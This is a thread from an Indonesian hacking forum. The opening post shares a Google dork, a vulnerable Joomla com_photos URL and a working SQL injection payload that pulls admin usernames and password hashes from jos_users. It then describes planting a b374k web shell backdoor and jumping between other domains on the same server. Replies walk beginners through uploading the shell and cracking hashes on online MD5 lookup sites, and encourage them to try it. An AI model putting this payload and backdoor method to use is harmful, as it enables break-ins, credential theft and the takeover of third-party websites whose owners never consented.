jumping dengan b374k
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
jumping dengan b374k
hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com | http://anharku.tk | http://anharku.us
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com | http://anharku.tk | http://anharku.us
Re: jumping dengan b374k
anharku wrote:hehehe..ketemu lagi dengan saya anharku
cuma seorang newbie yang mau berbagi aja..
saya kemarin habis dapet exp dari sumber sebelah nigh:
Dork : inurl:"com_photos"
[ Vulnerable File ]
[path]/index.php?option=com_photos&view=display&id=[ SQL ]
[ XpL ]
-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users+limit+0,1--
terus pas bisa masuk ane tanam nigh shell alias BACKDOOR (b374k) nagh pas masuk saya coba jumping dari root/directory belakang ke depannya..depanya klo pas beruntung dapet folder2 yang namanya domain .com ya kaya gambar ini nigh
nagh kalo dagh dapet yg kaya gini yahh terus tinggal dinikmati aja.... :devil
mau exploitasi lebih dalem..tapi ingat jangan di dropdown kasian yg punya web :circle:
dagh agh semoga bermanfaat... :love:
salam
anharku
http://codenesia.com http://anharku.tk | http://anharku.us
bisa ajar`n saya gak??kaya`n bagus tuh..... :kaca: :kaca:
Re: jumping dengan b374k
saya juga lagi belajar...
dicoba2 saja itu dork dan exploit nya :circle:
dicoba2 saja itu dork dan exploit nya :circle:
Re: jumping dengan b374k
Terima kasih kakak..................!
Re: jumping dengan b374k
Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:
:pusing: :pusing: :pusing: :pusing: :pusing:
Re: jumping dengan b374k
cara pasangnya kan tinggal di upload ke server terus di panggil alamat URL nya :circle:
Re: jumping dengan b374k
RJ-45 wrote:Saya bingung cara masangnya kakak................!
:pusing: :pusing: :pusing: :pusing: :pusing:
saya bingung cara masuknya neh RJ tp kalo masang shell saya tau,,,,,,, :pusing:: :pusing: :pusing: :pusing: :pusing: pusing: :pusing: :pusing: :pusing: :pusing:
Re: jumping dengan b374k
cara masuknya banyak kok..
intinya kamu harus punya akses sebagai administrator...
banyak cara kok...cari errornya terus munculin user passwordnya..
paswordnya biasanya masih encrypt'an jd harus di decrypt..
buat nge-decrypt banyak kok web penyedia jasa decript
seperti:
http://hashchecker.de
http://md5decrypter.co.uk
teknik yg lain kalau di joomla yagh reset password...
yang penting kamu masuk ke CMS nya terus upload shell atau BD b3j4k..
ga ada yg praktis sih semua butuh tahap dan pembelajaran...
ga cuma itu caranya kembangin sendiri dan kamu akan menemukan seni dalam dunia hacking :devil
just... membagi ilmu dari newbie :circle:
intinya kamu harus punya akses sebagai administrator...
banyak cara kok...cari errornya terus munculin user passwordnya..
paswordnya biasanya masih encrypt'an jd harus di decrypt..
buat nge-decrypt banyak kok web penyedia jasa decript
seperti:
http://hashchecker.de
http://md5decrypter.co.uk
teknik yg lain kalau di joomla yagh reset password...
yang penting kamu masuk ke CMS nya terus upload shell atau BD b3j4k..
ga ada yg praktis sih semua butuh tahap dan pembelajaran...
ga cuma itu caranya kembangin sendiri dan kamu akan menemukan seni dalam dunia hacking :devil
just... membagi ilmu dari newbie :circle: